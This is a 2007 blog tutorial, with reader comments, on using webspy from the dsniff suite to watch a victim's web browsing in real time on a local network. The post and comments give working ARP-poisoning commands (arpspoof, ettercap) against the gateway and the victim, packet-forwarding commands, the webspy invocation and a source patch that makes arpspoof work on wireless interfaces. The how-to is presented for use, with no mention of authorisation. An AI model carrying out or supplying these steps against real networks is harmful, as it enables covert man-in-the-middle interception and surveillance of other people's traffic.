Thursday, June 14, 2007

How to use Webspy from the dsniff suite

Webspy is an interesting tool from the dsniff family of tools including dsniff (password sniffer), arpspoof (ARP poisoning tool), dnsspoof (DNS spoofing tool), msgsnarf (view messages from IM clients), mailsnarf (view email messages), tcpkill (kill tcp connections on a local LAN), tcpnice (force other connections to "play nice" with their tcp connections) and webspy (view a targets web browsing in real time). When properly setup it will intercept web browsing requests from the victim and display them in the attackers web browser in real time. This post will show you how to run webspy successfully. I am assuming a basic knowledge of the Unix command shell in addition to reading the entire man pages for all of the applications listed in this write up.

You will need the following tools to successfully use webspy:

Tested using Ubuntu 7.04 and Slackware 11.

An ARP spoofing application, either arpspoof or ettercap will do.

fragrouter or echo 1 > /proc/sys/net/ipv4/ip_forward

Webspy

Web browser (Firefox 2.0.0.4 was used)

The first step is to successfully arp poison the target as well as the gateway for the local subnet. This can be accomplished via the use of one of two tools. The venerable arpspoof or the more recent ettercap (which contains its own plugin that allows for remote browsing but is outside the scope of this example). I will show both for completeness.

# arpspoof -i interface -t gatewayIP victimIP

# arpspoof -i interface -t victimIP gatewayIP

Open these in two separate shells and run them independently of one another. If you receive a "arpspoof: couldn't arp for host 10.1.1.1" or similar error please visit the Troubleshooting section at the end of this document.

To accomplish the same effect using ettercap as your ARP poisoner of choice:

# ettercap -i interface -Tq -M arp:remote /gatewayIP/ /victimIP/

At this stage you will need to open another shell and ensure that you are passing your stolen packets back onto the network. As is normal for most things there is more than one way to accomplish this goal. You will need to open another shell to execute these commands.

fragrouter -B1

If you do not have fragrouter or for some reason wish to pursue an alternate method of achieving the same goal you can use the following from the command line:

# echo 1 > /proc/sys/net/ipv4/ip_forward

You will need to open another shell/console to execute webspy:

# webspy -i interface victimIP

Well we are almost there! You will need to start one more shell and start up your browser from the command line (starting the browser via other methods did not function correctly for me).

# mozilla &

At this point if you have followed the directions correctly your broswer will start and any sites visited by the victimIP will appear in your browser in real time.

Troubleshooting:

Q:

Every time I attempt to execute arpspoof I get the following error: arpspoof: couldn't arp for host 10.1.1.1. I have tried various command line switches and nothing appears to work.

A;

I received this error on my Slackware 11 installation which was compiled from source as opposed to using a package manager. The function arp_cache_lookup does not use the correct interface when running under Linux .. it always uses interface "eth0".. Don't fret, we can change this without too much effort. Change directory to where you unpacked dsniff to, you will want to find the file arp.c and edit a single parameter within it. Using your favorite editor open arp.c and change the following:

strncpy(ar.arp_dev, "eth0", sizeof(ar.arp_dev));

to

strncpy(ar.arp_dev, "wlan0", sizeof(ar.arp_dev));

Save the file and recompile the application.

If you have other issues, you got it running properly or you just want to drop a line feel free to leave a comment.

May Your Skill Prevail.

6 comments:

gunce said...

Another way for troubleshooting is to use the -i option to specify the interface.

olegunner said...

Awesome to the max ! Worked for me but kinda scary though !

Anthony Williams said...

*gunce

In my experience using the -i switch does not work with modern wifi interfaces. Hence the source code edit and recompile.

*olegunner, glad that it worked out for you! It can be a bit intimidating at first but those who persevere get the rewards.

Pierre-Yves said...

Thx for the tutorial.

Using ettercap, you shouldn't enable ip forwarding, because it disable it (read the man).

sudo ettercap -i eth1 -Tq -M arp:remote /192.168.1.1/ //

=> you need ettercap to find at least 2 hosts (else, retry).

Using webspy : I have one little problem : webspy rely on server ips not on server names. That can be a problem on servers with multiple sites.

the url mysite.com/mypage will become 64.293.38.2/mypage , and you may have a server error saying "you didn't provide the servername".

I think webspy should look into the packets to find the server name... Do you know another tool that would do that ?

DGeezer said...

does anyone know if this method can be used using Backtrack 3 and Firefox v.2.0.0.11, and how it might be set up. I used the above methods, but when I issued the 'mozilla &' command, nothing happened! also, thanks in advance :-)

sudo becomes root said...

Hi
Thank you for your detailed tutorial and it worked!
But strangely when sniffed url opening up in my firefox, I also got another web page opening up saying "I am alive!" in text, I have no idea where it came from and why it came up, have you encountered this problem before?

Cheers,
Harry